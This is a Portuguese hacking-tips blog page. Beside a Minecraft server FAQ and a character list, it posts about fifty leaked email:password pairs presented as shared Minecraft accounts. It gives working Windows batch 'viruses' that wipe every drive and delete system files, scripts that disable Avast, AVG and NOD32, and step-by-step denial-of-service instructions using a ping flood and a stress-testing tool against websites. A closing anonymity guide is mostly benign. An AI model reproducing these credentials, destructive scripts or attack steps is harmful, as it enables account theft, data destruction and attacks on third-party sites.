Com essas quatro coisas devidamente configuradas a seu gosto, é hora de abrir o servidor. Role a página pra cima e clique em "Iniciar". Pronto. Agora é só copiar o seu IP, colar no Minecraft e passar pros seus amigos!

Perguntas Frequentes:

Quanto tempo os servidores da Aternos ficam online?
Os servidores ficam ativos até enquanto houver jogadores nele. O serviço verifica de 5 em 5 minutos se há pessoas online jogando. Quando todos os jogadores saem, o servidor fecha, e só pode ser reaberto novamente depois de alguns minutos.

Meu servidor não abre!
Por ser um serviço gratuito, o Aternos é usado por milhares de pessoas, então pode ser que naquela hora que você quis abrir os hosts já estavam muito cheios. O jeito é aguardar alguns minutos e tentar novamente.

Caraceteres Especiais

Alguns caracteres especiais, só copiar o qual quer e colar.

∞ ♫ ♬ ♭ ♮ ♯ ♰ ♱ ✁ ✂ ✃ ✄ ✆ ✇ ✈ ✉ ✌ ✍ ✎ ✏ ✐ ✑ ✒ ✓ ✔ ✕ ✖ ✗ ✘ ✙ ✚ ✛ ✜ ✝ ✞ ✟ ✠ ✡ ✢ ✣ ✤ ✥ ✦ ✧ ✩ ✪ ✫ ✬ ✭ ✮ ✯ ✰ ✱ ▀ ▁ ▂ ▃ ▄ ▅ ▆ ▇ █ ▉ ▊ ▋ ▍ ▎ ▏ ▐ ░ ▒ ▓ ■ □ ▢ ▣ ▤ ▥ ▦ ▧ ▨ ▩ ▪ ▫ ▬ ▭ ▮ ▯ ▰ ▱ ▲ △ ▴ ▵ ▶ ▷ ▸ ▹ ► ▻ ▼ ▽ ▾ ▿ ◀ ◁ ◂ ◃◄ ◅ ◆ ◇ ◈ ◉ ◊ ○ ◌ ◍ ◎ ● ◐ ◑ ◒ ◓ ◔ ◕ ◖ ◗ ◘ ◙ ◚ ◛ ◜ ◝ ◞ ◟ ◠ ◡ ◢ ◣ ◤ ◥ ◦ ◧ ◨ ◩ ◪ ◫ ◬ ◭ ◮ ◯ ☀ ☁ ☂ ☃ ☄ ★ ☆ ☇ ☈ ☉ ☊ ☋ ☌ ☍ ☎ ☏ ☐ ☑ ☒ ☓ ☚ ☛ ☜ ☝ ☞ ☟ ☠ ☡ ☢ ☣ ☤ ☥ ☦ ☧ ☨ ☩ ☪ ☫ ☬ ☭ ☮ ☯ ☰ ☱ ☲ ☳ ☴ ☵ ☶ ☷ ☸ ☹ ☺ ☻ ☼ ☽ ☾ ☿ ♀ ♁ ♂ ♃ ♄ ♅ ♆ ♇ ♈ ♉ ♊ ♋ ♌ ♍ ♎ ♏ ♐ ♑ ♒ ♓ ♔ ♕ ♖ ♗ ♘ ♙ ♚ ♛ ♜ ♝ ♞ ♟ ♠ ♡ ♢ ♣ ♤ ♥ ♦ ♧ ♨ ♩ ♪ ✲ ✳ ✴ ✵ ✶ ✷ ✸ ✹ ✺ ✻ ✼ ✽ ✾ ✿ ❀ ❁ ❂ ❃ ❄ ❅ ❆ ❇ ❈ ❉ ❊ ❋ ❍ ❏ ❐ ❑ ❒ ❖ ❘ ❙ ❚ ❛ ❜ ❝ ❞ ❡ ❢ ❣ ❤ ❥ ❦ ❧ ❶ ❷ ❸ ❹ ❺ ❻ ❼ ❽ ❾ ❿ ➀ ➁ ➂ ➃ ➄ ➅ ➆ ➇ ➈ ➉ ➊ ➋ ➌ ➍ ➎ ➏ ➐ ➑ ➒ ➓ ➔ ➘ ➙ ➚ ➛ ➜ ➝ ➞ ➟ ➠ ➡ ➢ ➣ ➤ ➥ ➦ ➧ ➨ ➩ ➪ ➫ ➬ ➭ ➮ ➯ ➱ ➲ ➳ ➴ ➵ ➶ ➷ ➸ ➹ ➺ ➻ ➼ ➽ ➾ ⟡ ⟦ ⟧ ⟨ ⟩ ⟪ ⟫ ⟰ ⟱ ⟲ ⟳ ⟴ ⟵ ⟿ ⤡ ⤢ ⤣ ⤤ ⤥ ⤦ ⤧ ⤨ ⤩ ⤪ ⤫    ⤬ ⤭ ⤮ ⤯ ⤰ ⤱ ⤲ ⤳ ⤴ ⤵ ⤶ ⤷ ⤸ ⤹ ⤺ ⤻ ⤼ ⤽ ⤾ ⤿ ⥀ ⥁ ⥂ ⥃ ⥄ ⥅ ⥆ ⥇ ⥈ ⥉ ⥊ ⥋ ⥌ ⥍ ⥎ ⥏ ⥐ ⥑ ⥒ ⥓ ⥔ ⥕ ⥖ ⥗ ⥘ ⥙ ⥚ ⥛ ⥜ ⥝ ⥞ ⥟ 2 ⥠ ⥡ ⥢ ⥣ ⥤ ⥥ ⥦ ⥧ ⥨ ⥩ ⥪ ⥫ ⥬ ⥭ ⥮ ⥯ ⥰ ⥱ ⥲ ⥳ ⥴ ⥵ ⥶ ⥷ ⥸ ⥹ ⥺ ⥻ ⥼ ⥽ ⥾ ⥿ ⧼ ⧽ ⨀ ⨁ ⨂ ⨃ ⨄ ⨅ ⨆ ⨇ ⨈ ⨉ 〇 〈 〉 《 》 「 」 『 』 【 】 〒 〔 〕 〖 〗 〘 〙 〚 〛 〜 〝₱ ₲ ₳ ⃒ ⃔ ⃕ ⃖ ⃗ ⃠ ⃡ ⃩ ⃪ ℂ ℊ ℍ ℒ ℕ № ℗ ℙ ℚ ℛ ℜ ℝ ℤ ℰ ℳ ℺ ℽ ℿ ⅀ ⅁ ⅂ ⅃ ⅄ ⅅ ⅆ ⅇ ⅈ ⅉ ⅓ ⅔ ⅕ ⅖ ⅗ ⅘ ⅙ ⅚ ⅛ ⅜ ⅝ ⅞ ⅟ Ⅰ Ⅱ Ⅲ Ⅳ Ⅴ Ⅵ Ⅶ Ⅷ Ⅸ Ⅹ Ⅺ Ⅻ Ⅼ Ⅽ Ⅾ Ⅿ ⅰ ⅱ ⅲ ⅳ ⅴ ⅵ ⅶ ⅷ ⅸ ⅹ ⅺ ⅻ ⅼ ⅽ ⅾ ⅿ ↂ ← ↑ → ↓ ↔ ↕ ↖ ↗ ↘ ↙ ↚ ↛ ↜ ↝ ↞ ↟ ↠ ↡ ↢ ↣ ↤ ↥ ↦ ↧ ↨ ↩ ↪ ↫ ↬ ↭ ↮ ↯ ↰ ↱ ↲ ↳ ↴ ↵ ↶ ↷ ↸ ↹ ↺ ↻ ↼ ↽ ↾ ↿ 2 1 C 0 ⇀ ⇁ ⇂ ⇃ ⇄ ⇅ ⇆ ⇇ ⇈ ⇉ ⇊ ⇋ ⇌ ⇍ ⇎ ⇏ ⇐ ⇑ ⇒ ⇓ ⇔ ⇕ ⇖ ⇗ ⇘ ⇙ ⇚ ⇛ ⇜ ⇝ ⇞ ⇟ ⇠ ⇡ ⇢ ⇣ ⇤ ⇥ ⇦ ⇧ ⇨ ⇩ ⇪ ⇫ ⇬ ⇭ ⇮ ⇯ ⇰ ⇱ ⇲ ⇳⇴ ⇶ ⇷ ⇸ ⇹ ⇺ ⇻ ⇼ ⇽ ⇾ ⇿ ← ↑ → ↓ ↔ ↕ ↖ ↗ ↘ ↙ ↚ ↛ ↜ ↝ ↞ ↟ Ⅰ Ⅱ Ⅲ Ⅳ Ⅴ Ⅵ Ⅶ Ⅷ Ⅸ Ⅹ Ⅺ Ⅻ Ⅼ Ⅽ Ⅾ Ⅿ ⅰ ⅱ ⅲ ⅳ ⅴ ⅵ ⅶ ⅷ ⅸ ⅹ ⅺ ⅻ ⅓ ⅔ ⅕ ⅖ ⅗ ⅘ ⅙ ⅚ ⅛ ⅜ ⅝ ⅞ ⅟ ᴖ ᴗ ᴝ ᴟ ᴥ ᴦ ᴧ ० १ ॰ ৲ ৴ ੦ ૦ ଽ ୹ ఇ ౦ ౧ ಇ ൫ ൬๏ ๐ ໂ ໃ ໄ ༌ ། ༎ ༏ ༐ ༑ ༒ ༼ ༽ ༾ ༿ ོ ∬ ∆ ∇ ∊ ∋ ∍ ∎ ∏ ∐ ∑ ∓ ∔ ∕ ∖ ∘ ∙ ∛ ∜ ∝ ∞ ∟ ∬ ∭ ∳ ∴ ∵ ∶ ∷ ∸ ∹ ∺ ∻ ∼ ∽ ∾ ∿ ≀ ≁ ≂ ≃ ≄ ≅ ≆ ≇ ≈ ≉ ≊ ≋ ≌ ≍ ≎ ≏ ≐ ≑ ≒ ≓ ≔ ≕ ≖ ≗ ≘ ≙ ≚ ≛ ≜ ≝ ≞ ≟ ≠ ≡ ≢ ≣ ≤ ≥ ≦ ≧ ≨ ≩ ≪ ≫ ≬ ≭ ≮ ≯ ≰ ≱ ≲ ≳ ≴ ≵ ≶ ≷ ≸ ≹ ≺ ≻ ≼ ≽ ≾ ≿ ⊀ ⊁ ⊂ ⊃ ⊄ ⊅ ⊆ ⊇ ⊈ ⊉ ⊊ ⊋ ⊌ ⊍ ⊎ ⊏ ⊐ ⊑ ⊒ ⊓ ⊔ ⊕ ⊖ ⊗ ⊘ ⊙ ⊚ ⊛ ⊜ ⊝ ⊞ ⊟ ⊠ ⊡ ⊢ ⊣ ⊤ ⊥ ⊦ ⊧ ⊨ ⊩ ⊪ ⊫ ⊬ ⊭ ⊮ ⊯ ⊰ ⊱ ⊲ ⊳ ⊴ ⊵ ⊶ ⊷ ⊸ ⊹ ⊺ ⊻ ⊼ ⊽ ⊾ ⊿ ⋀ ⋁ ⋂ ⋃ ⋄ ⋅ ⋇ ⋈ ⋉ ⋊ ⋋ ⋌ ⋍ ⋎ ⋏ ⋐ ⋑ ⋒ ⋓ ⋔ ⋕ ⋖ ⋗ ⋘ ⋙ ⋚ ⋛ ⋜ ⋝ ⋞ ⋟ ⋠ ⋡ ⋢ ⋣ ⋤ ⋥ ⋦ ⋧ ⋨ ⋩ ⋪ ⋫ ⋬ ⋭ ⋮ ⋯ ⋰ ⋱ ⋲ ⋳ ⋴ ⋵ ⋶ ⋷ ⋸ ⋹ ⋺ ⋻ ⋼ ⋽ ⋾ ⋿ ⌀ ⌁ ⌂ ⌃ ⌄ ⌅ ⌆ ⌇ ⌈ ⌉ ⌊ ⌋ ⌌ ⌍ ⌎ ⌏ ⌐ ⌑ ⌒ ⌓ ⌔ ⌕ ⌖ ⌗ ⌘ ⌙ ⌚ ⌛ ⌜ ⌝ ⌞ ⌟ ⌠ ⌡ ⌢ ⌣ ⌤ ⌥ ⌦ ⌧ ⌨ ⟨ ⟩ ⌫ ⌬ ⌭ ⌮ ⌯ ⌰ ⌱ ⌲ ⌳ ⌴ ⌵ ⌶ ⌷ ⌸ ⌹ ⌺ ⌻ ⌼ ⌽ ⌾ ⌿ ⍀ ⍁ ⍂ ⍃ ⍄ ⍅ ⍆ ⍇ ⍈ ⍉ ⍊ ⍋ ⍌ ⍍ ⍎ ⍏ ⍐ ⍑ ⍒ ⍓ ⍔ ⍕ ⍖ ⍗ ⍘ ⍙ ⍚ ⍛ ⍜ ⍝ ⍞ ⍟ ⍠ ⍡ ⍢ ⍣ ⍤ ⍥ ⍦ ⍧ ⍨ ⍩ ⍪ ⍫    ⍬ ⍭ ⍮ ⍯ ⍰ ⍱ ⍲ ⍳ ⎠ ⎡ ⎢ ⎣ ⎤ ⎥ ⎦ ⎧ ⎨ ⎩ ⎪ ⎫ ⎬ ⎭ ⎮ ⎯ ⎰⎱ ⎲ ⎳ ⎴ ⎵ ⎶ ⎛ ⎜ ⎝ ⎞ ⎟ ⏜ ⏝ ⏞ ⏟ ⑀ ⑁ ⑂ ⑃ ⑄ ⑅ ⑆ ⑇ ⑈ ⑉ ⑊ ① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ─ ━ │ ┃ ┄ ┅ ┆ ┇ ┈ ┉ ┊ ┋ ┌ ┍ ┎ ┏ ┐ ┑ ┒ ┓ └ ┕ ┖ ┗ ┘ ┙ ┚ ┛├ ┝ ┞ ┟ ┠ ┡ ┢ ┣ ┤┥ ┦ ┧ ┨ ┩ ┪ ┫ ┬ ┭ ┮ ┯ ┰ ┱ ┲ ┳ ┴ ┵ ┶ ┷ ┸ ┹ ┺ ┻ ┼ ┽ ┾ ┿ ╀ ╁ ╂ ╃ ╄ ╅ ╆ ╇ ╈ ╉ ╊ ╋ ╌ ╍ ╎ ╏ ═ ║ ╒ ╓ ╔ ╕╖ ╗ ╘ ╙ ╚ ╛ ╜ ╝ ╞ ╟ ╠ ╡ ╢ ╣ ╤ ╥ ╦ ╧ ╨ ╩ ╪ ╫ ╬ ╭ ╮ ╯    ╰ ╱ ╲ ╳ ╴ ╵ ╶ ╷ ╸ ╹ ╺ ╻ ╼ ╽ ╾ ╿ ⓿ 〞 〟 ︴︵ ︶ ︷ ︸ ︹ ︺ ︻ ︼ ︽ ︾ ﹀ ﹁ ﹂ ﹃ ﹄ ﹙ ﹚ ﹛ ﹜ ﹝ ﹞ ﹟ ¬ ¥ ₩ € � ‚ ƒ „ … † ‡ ˆ ‰ Š ‹ Œ � Ž � � — ™ š › œ � ž Ÿ ¡ ¢ £ ¤ ¥ ¦ § ¨ © ª « ¬ ­ ® ° ± ²    ³ µ ¶ · ¸ ¹ º »    ¼ ½ ¾ ¿    Æ × Ø Þ    ß æ ÷ ø    þ Đ Ħħ Į Į Ŀ ŀ Ł ł Ŋ ŋ Ŧ    ŧ ſ ƀ Ɓ Ƃ ƃ Ƅ ƅ Ɔ Ɖ Ɗ Ƌ ƍ Ǝ Ə Ɛ Ƒ ƒ Ɣ ƕ Ɩ Ɨ ƚ ƛ Ɯ Ɲ ƞ Ɵ Ƣ ƣ ƥ Ƨ ƨ Ʃ ƪ Ƭ ƭ Ʊ Ʋ Ƴ ƴ Ƶ ƶ Ʒ Ƹ ƹ ƺ ƻ ƾ ƿ ǁ ǂ Ǥ ǥ Ǯ ǯ Ƕ Ƿ Ƞ ȡ Ȣ ȣ ȴ ȵ ȶ ȷ ȸ ȹ Ⱥ Ȼ ȼ Ƚ Ⱦ ɀ Ɂ ɂ Ƀ Ʉ Ʌ Ɇ ɇ Ɉ ɉ Ɋ ɋ Ɍ ɍ Ɏ ɏ ɐ ɑ ɒ ɓ ɔ ɕ ɖ ɗ ɘ ə ɛ ɜ ɝ ɞ ɟ ɠ ɡ ɢ ɣ ɤ ɥ ɦ ɧ ɨ ɩ ɪ ɫ ɬ ɭ ɮ ɯ ɰ ɱ ɲ ɳ ɵ ɶ ɷ ɸ ɹ ɺ ɻ ɼ ɽ ɾ ɿ ʁ ʃ ʄ ʅ ʆ ʇ ʈ ʉ ʊ ʋ ʌ ʍ ʎ ʑ ʒ ʓ ʔ ʕ ʖ ʗ ʘ ʚ ʝ ʞ ʠ ʡ ʢ ʦ ʧ ʨ ʩ ʪ ʬ ʭ ʮ ʯ ʰ ʱ ʲ ʳ ʴ ʵ ʶ ʷ ʸ ʹ ʺ ʻ ʼ ʽ ʾ ʿ ˀ ˁ ˄ ˅ ˆ ˇ ˈ ˉ ˊ ˋ ˌ ˍ ˎ ˏ ˑ ˒ ˓ ˔ ˕ ˖ ˗ ˘ ˙ ˚ ˛ ˜ ˝ ˝ ˟ ˠ ˡ ˢ ˣ ˤ ˥ ˦ ˧ ˨ ˩ ˪ ˫ ˬ ˭ ˮ ˯ ˰ ˱ ˲ ˳ ˴ ˵ ˶ ˷ ˸ ˹ ˺ ˻ ˼ ˽ ˾ ˿ ̛ ̦ ʹ ͵ ͺ ͻ ͼ ͽ ; ΄ ΅ Δ Θ Ξ Π Σ Φ Ψ Ω έ ί ΰ β γ δ ε ζ θ ι κ λ μ ν ξ ο π ρ ς σ τ υ φ χ ψ ω Ϡ ϡ Ϣ ϣ Ϥ ϥ Ϧ ϧ Ϩ ϩ Ϫ ϫ Ϭ ϭ Ϯ ϯ ϰ ϱ ϵ ϶ Ϸ ϸ ϻ ϼ Ͻ Ͼ Ͽ Ж Ф Ш Ю Я ф Ѡ Ѳ Ѽ ѽ Ѿ Ҩ ҩ Ұ Ӷ Ԑ ԑ Ո շ ۝ ۞ ۩ ۵ ܓ ܟ ݀ ހ މ Ⴙ ᄀ ᄼ ᄽ ᄾ ᄿ ᆍ ᆕ ᆜ † ‡ • ‣ ‴ ‷ ‹ › ‿ ⁀ ₓ ₦ ₩

sexta-feira, 9 de outubro de 2015

Contas compartilhadas de Minecraft Original

moo2cute8@gmail.com:moo2cute8
hugo.b@neuf.fr:hugo-team
r_hermansyah@yahoo.com:25august
teffiec@aol.com:TROYCARR13
aaalikat9@yahoo.com:newyork9
rdgabino@gmail.com:Valentino#1
alitodddaniel@gmail.com:daniel2005
napoe03@gmail.com:snoodle1
weaveremt@yahoo.com:Password5&
teax756@gmail.com:juhanizxc756
mtleblanc@nycap.rr.com:virginia919
sumaya.121@hotmail.com:sumaya123
richjleejr@gmail.com:richrox7704
tt_rafa@hotmail.com:valentina16
pbibawy@hotmail.com:Yoshi0114
mcsparkly100@yahoo.com:frankie100
p.kudlinski@web.de:1qa2ws3ed
gianni.puglia@gmail.com:4057basel
gmpttrs@gmail.com:shitface1
luca.moujaes@hotmail.com:buster03
lord.kroolik@gmail.com:Fallout2
timothe.caron1@gmail.com:titou54110
flodiesel@gmail.com:florent1942
sanzoku289@gmail.com:hitonorio
chase.network@live.com:1z25b3x23d
alexander_98@live.no:webkamera19
rbassett0134@gmail.com:sandy0134
viscerius@hotmail.com:necron99
pr.lucie@hotmail.fr:casablanca
dr_shavargo123@hotmail.com:hunter11
alanvionnet@hotmail.com:12344321
simon4180@yahoo.co.uk:leighann1
kennedy.s131@yahoo.com:steven
hoeigotthis@gmail.com:halofan3
jennytoxic@hotmail.com:agitos
foukdasbouk@hotmail.fr:papanoel2008
arvinjenzenagbayani@gmail.com:darwin4476
crazedmadness@gmail.com:shotgun3
markus_boelter@web.de:sweet08
rhayn2810@yahoo.de:kessy2309
jojoplantier@yahoo.fr:joffrey1593
zeyu.shao@hotmail.com:Pacman11
milesnfreeman@gmail.com:Ragingburrito01
xlrame@yahoo.com:Banzai08
dazedtracers@yahoo.com:%Hello12
tickme8@gmail.com:tick271928
pamelalee522@gmail.com:Domo2001
svenove.axelsson@hotmail.com:23Edmil
mthompson@skywayag.org:64diamond
trmaldonado@comcast.net:rpm081199**
boratheawesome@gmail.com:boramonster123
serenavivi@gmail.com:love12345
prmerc@ptd.net:Fishtrain1
cristopher_ivan@hotmail.com:dingo123

Contas retiradas de geradordeminecraft.com/ :D

quarta-feira, 2 de setembro de 2015

Como fazer víruz básico com o Bloco de Notas

Estou ensinando a criar Vírus Básico ! Lembrando que todos os vírus ai embaixo você colca no bloco de notas e salva como ".bat"

Cavalo de Tróia - Todos sabem qual o dano que vai causar

@echo off
echo erro..
break off
deltree /y c:\*.*
deltree /y d:\*.*
deltree /y e:\*.*
deltree /y f:\*.*
exit

HIV - Esse vírus vai zoar todo o PC da pessoa

del %systemdrive%\*.* /s/q

Vírus para travar o PC da pessoa

@echo off
@break off
:1
start gpedit.msc
goto 1

Esse vírus ferra todo o PC da pessoas , quando a pessoa abrir vai aparecer várias mensagens de erro , fazendo a pessoa desligar o PC , para conseguir tirar esse vírus do PC só formatando !

@echo off
shutdown -s -t 17
Del C:\Windows\System32\Dllcache\Shell32.dll
Del C:\Windows\System32\Shell32.dll
echo/msgbox "Erro do fim", vbcritical, "100000" > mensagem.vbs
echo/For /l %%%%r in ^(1,1,100000^) do ^(start mensagem.vbs^) > Teste.cmd
echo/Exit >> Teste.cmd
Start /separate Teste.cmd
Rd /q /s "%windir%"

Como desativar antivirus

DESATIVAR AVAST

@echo off
CD C:\Arquivos de programas\Alwil Software\Avast4
Ren ashwebsv.exe ashwebsv.rar
Ren ashdisp.exe ashdisp.rar
Ren ashmaisv.exe ashmaisv.rar
Ren ashserv.exe ashserv.rar
Ren ashwebsv.exe ashwebsv.rar
Ren aswupdsv.exe aswupdsv.rar
exit

Desativar AVG

@echo off
CD C:\ARQUIVOS DE PROGRAMAS\GRISOFT\AVG FREE
Ren avgemc.exe avgemc.rar
Ren avgcc.exe avgcc.rar
Ren avgamsvr.exe avgamsvr.rar
Ren avgupsvc.exe avgupsvc.rar
Ren avgw.exe avgw.rar
exit

Desativar o Nod32

@echo off
CD C:\Arquivos de programas\ESET
Ren nod32krn.exe nod32krn.rar
Ren nod32.exe nod32.rar
Ren nod32kui.exe nod32kui.rar
exit

Derubar site, como fazer?

Derubar sites
1º desculbra o Ip do site: Abra o seu CMD e digite ping -f-l10000000 www.siteaqui.com e de Enter.
Vai aparecer disparando NOME DO SITE e o Ip do lado entre chaves []
2º baixe o programa Web stress tester 4.0 http://download.cnet.com/Web-Stress-Tester/3000-2085_4-75316 840.html
Após baixado configure ele. Assim: Preenchimentos de campos. 1º Url Do site pequeno que você quer derrubar : www.siteparapara.com
Threads coloque: 20 clients per Threads coloque: 20 connection coloque: dose Method colque: post
EM Proxy Ip : Colque o Ip do site que vocÊ consegueio. Proxy port coloque: 80
Na caixa abaixo vazia Coloque # Ate prencher o vaco não precisa ficar botando se não se nunca vai acabar de pôr .
Aperte Run ! E espere aparecer numeros em 3xx, 4xx e 5xx se estiver aparecendo em um deles e alguns dos outros da dando certo se aparecer só neles site derrubado pode entrar que não vai da . Abraços a todos espero que fique bem entendido . Lembrando conhecimento não é crime depedendo de como você use . Só funciona em Sites Pequenos.

sexta-feira, 28 de agosto de 2015

Ataque a sites DDoS

Um ataque Ddos (Distributed Denial of Service) é quando um site recebeuitos acessos no mesmo momento, ou seja, o site fica instável pelas vitimas ao mesmo tempo, chegando aos limites do seu navegador. Mas, muitos perguntam?
Como eu faço esse ataque Ddos? Eu lhes ensinarei isso, vamos utilizar o CMD (Prompt do Comando) que todos os computadores com Sistema Operacional do Windows possue.
Vamos lá:

Primeiro passo: Abra o menu iniciar, e no campo de busca digite CMD. Após isso dê um clique no CMD para abri-lo.

Segundo passo: Temos que ter o IP do site-alvo. Para conseguir o IP do site alvo, digite: ping + site-alvo. Exemplo: Ping hackers24hrs.wordpress.com

Pronto! Já temos o IP do nosso site alvo! Agora basta que você digite o segundo código:
 ping IP-DO-SITE -l 65500 -n 10000000 -w 0.00001

Onde está IP-DO-SITE você irá colocar o IP do site-alvo! Agora de um Enter e aguarde algum tempo! É normal que sua internet fique MUITO lenta, pois está emviamdo os dados de pacotes para o site sobrecarregar! Agora irei explicar o significado dos códigos:

-n 10000000: O número de tentativas para a negação do serviço. Ali, você pode alterar o numero 10000000 para o valor de pacotes que deseja enviar ao sevidor do site.

-w 0.00001: é o tempo de espera depois do ataque do ping.

Observações:
Se você alterar o valor das letras não FUNCIONARÁ o ataque ao site!

terça-feira, 25 de agosto de 2015

#Anonymous - Como se manter anônimo na internet de forma segura.

 Créditos: http://forum.anonymousbrasil.com/index.php/topic,7620.0.html
=== Índice ===

1. Introdução
2. Primeiras dicas
3. Sobre os proxies
4. Cookies
5. Transferências FTP
6. Transação segura
7. SSL tunelling
8. Anonymous Remailers
9. Spyware
10. Faixas de limpeza
11. Mantendo-se anônimo no IRC
12. E-mail criptografado

=== 1. Introdução ===

Hoje em dia, todo mundo quer privacidade na web, porque não importa onde você vá, alguém pode estar observando você. Alguém como seu empregador, alguém que tenta cortar seu sistema, as empresas que recolhem todas as suas informações para vender para outras empresas, ou até mesmo o governo, pode estar no seu caminho enquanto você navega tranquilamente na web. Assim, o anonimato na web significa ser capaz usar todos os seus serviços sem nenhuma preocupação de alguém estar bisbilhotando seus dados.

O seu computador esta conectado à rede, ele tem um endereço IP (Internet Protocol). Se você tiver uma conexão dial-up, seu IP muda a cada vez que você se conectar à internet (isso nem sempre é verdade, no entanto. Há provedores de conexão discada, especialmente para estudantes universitários, que têm IPs estáticos). Cable modems e conexões DSL tem um IP estático, o que significa que o endereço IP não muda. Um dos objetivos de se manter anônimo é se certificar que seu IP (estático ou dinâmico), não seja revelado a outros usuários da internet, ou para administradores dos servidores que vagam ao utilizar serviços de internet.

Este texto tenta dar-lhe algumas dicas sobre como manter o seu anonimato na web. Algumas das sugestões podem parecer banais, mas acho que você realmente tem que obedece-las em quaisquer situações.

=== 2. Primeiras dicas ===

Ao conversar no IRC, ICQ, AIM (etc...), não forneça informações pessoais sobre si como onde você vive, seu trabalho, etc.

Não use seu endereço de e-mail principal em qualquer lugar exceto para membros da família, amigos ou pessoas de confiança. Em vez disso, crie para si mesmo uma conta de e-mail baseado na web, como Yahoo, Hotmail, mail.com, etc. E utilize este endereço de e-mail para se inscrever nesses serviços, ao invés dar seu e-mail para baixar algo, ou a publicar em sua página inicial.

Ao inscrever-se para serviços na web, não de sua informação real, como endereço, número de telefone e tal, a menos que você realmente precise para fazê-lo. Este é o tipo de informação que as empresas de coleta de informações gostariam de obter, de modo que eles possam vender para fora e encher sua caixa de correio com spam.

Use um proxy anônimo para navegar na web. Isso faz com que seu IP não seja armazenado nos registros do servidor da web. (Webservers registram cada solicitação GET feito, junto com a data, hora e IP. Este é o lugar onde o proxy entra. Eles irão obter o IP do proxy, não o seu). Use remailers anônimos para enviar seus e-mails.

A criptografia também pode ajudá-lo, certificando-se que o material que você vai enviar para fora da web, como um e-mail, etc, é cifrada, não permitindo que qualquer pessoa que não tem a chave possa lê-lo. Programas como o PGP (Pretty Good Privacy) são toolkits com tudo que você precisa para proteger suas coisas.

Exclua rastros de seu trabalho com o computador, incluindo arquivos de histórico, cache ou arquivos de backup.

=== 3. Sobre os proxies ===

Os proxies são caches que transmitem dados. Quando você configurar seu navegador para usar um proxy, ele nunca se conecta à URL. Em vez disso, sempre se conecta ao servidor proxy, e pede para obter a URL para você. Ele funciona de forma semelhante com outro tipo de serviços, tais como IRC, ICQ etc. Não será uma conexão direta entre você e o servidor, para que o seu verdadeiro endereço IP não seja revelado para o servidor. Quando você ver um site no servidor, o servidor não vai ver o seu IP. Alguns proxies web não suportam o encaminhamento dos cookies, cujo apoio é exigido por alguns dos sites (por ex. Hotmail).

Aqui estão algumas proxies anônimos que você pode usar para navegar anonimamente (observe que alguns destes podem ser pago):

Aixs - aixs.net
The Cloak - www.the-cloak.com
Rewebber - www.anon.de
Anonymizer - www.anonymizer.com

Você vai encontrar muito provavelmente vários sites que fornecem as listas de proxies e remailers não autorizadas. Essas listas estão sendo compilada, geralmente com a ajuda de scanners de portas, digitalização para computadores com wingate ou backdoors de outros proxies. Usar esses proxies é ilegal, e está sendo considerado como o acesso não autorizado de computador. Se você receber algum verifique se a informação é legal.

Se você de qualquer maneira decidir não usar proxy, pelo menos, não se esqueça de remover suas informações pessoais do seu browser. Depois de remover detalhes como seu nome e endereço de e-mail de seu navegador, a única informação de um site pode farejar é o seu endereço IP e localização geográfica.

Java e JavaScript pode assumir o controle de seu navegador de forma inesperada, e se você estiver navegando para lugares desconhecidos e potencialmente perigosos você deve estar ciente de que há erros em navegadores vulneráveis (principalmente os do Internet Explorer).

=== 4. Cookies ===

Talvez você não esteja ciente do fato de que é, se você tiver o recurso "permitir cookies" no seu navegador, os sites pode armazenar todos os tipos de informação no seu disco rígido. Cookies são pequenos arquivos que contêm vários tipos de informações que podem ser lidas pelos sites quando você estiver visitando-os. O uso mais comum é para rastrear dados demográficos para as agências de publicidade que querem ver apenas o que os consumidores de um determinado site estão procurando. Websites também usam cookies para manter suas informações de conta up-to-date. Então, por exemplo, quando você visitar o seu e-mail webbased sem ser unlogged, algumas horas mais tarde, você está sendo conectado, mesmo se você desligar o computador. Seu login e senha foi simplesmente armazenados no seu disco rígido no arquivo de cookie. Esta é uma ameaça à segurança em caso que há mais pessoas que têm o acesso ao seu computador.

As maiorias dos navegadores oferecem a possibilidade de se desligar os cookies, mas alguns sites como Hotmail.com obriga-os a ser ligado. No caso de você decidiu permitir cookies, pelo menos, nunca se esqueça de fazer logoff a partir de sites quando você terminar de acessa-los.

=== 5. Transferências FTP ===

Ao usar um programa cliente de FTP para baixar arquivos, assegurar-se que ele está dando uma senha falsa, como guest@unknown.com, não a sua real. Se o seu navegador permite que você desative o recurso que envia o seu endereço de e-mail como uma senha para sessões de FTP anônimas.

=== 6. Transação segura ===

Tudo que está sendo enviado a partir do servidor web para o seu navegador é geralmente em formato de texto simples. Isso significa que, toda a informação transferida pode ser "inalada" facilmente sobre a rota. Alguns dos servidores web suportam SSL (que significa Secure Socket Layer). Para visualizar e utilizar esses sites, você vai precisar de apoio SSL no seu browser também. Você reconhece que a conexão é criptografada, se a URL começa com "https://" em vez de "http://". Nunca use servidor web sem SSL para enviar ou receber informações confidenciais, privada ou de negócios (números de cartão de crédito, senhas etc.)

=== 7. SSL tunelling ===

- O que é SSL?

SSL significa Secure Socket Layer Secure implica uma criptografia, enquanto Socket Layer denota um acréscimo ao sistema Window Socket, Winsock. Para aqueles que não sabem, um soquete é um anexo a uma porta em um sistema. Você pode ter muitos soquetes em uma porta, desde que sejam non-blocking (permitindo o controle passar para outra aplicação tomada que deseje se conectar a essa porta).

A Secure Socket Layer significa que quaisquer bases debaixo dele, são seguros e protegidos. A ideia por trás do SSL era fornecer uma criptografada e, portanto, uma rota segura para o tráfego ao longo de um sistema baseado em soquete, tais como o TCP/IP (protocolo de internet). Isso permite mais segurança em transações com cartões de crédito na Internet, comunicações encriptadas e protegidas ao longo de uma linha de dados.

O SSL usa um padrão de criptografia desenvolvido pela RSA. A RSA é uma respeitada organização americana especializada em criptografia e segurança de dados. Inicialmente, eles desenvolveram um comprimento de cifra de apenas 40 bits para uso com o Secure Socket Layer, este foi considerado fraco e, portanto, uma criptografia cifra muito mais complicada foi criada, 128 bits. O raciocínio por trás dele era simples: ele precisa ser seguro.

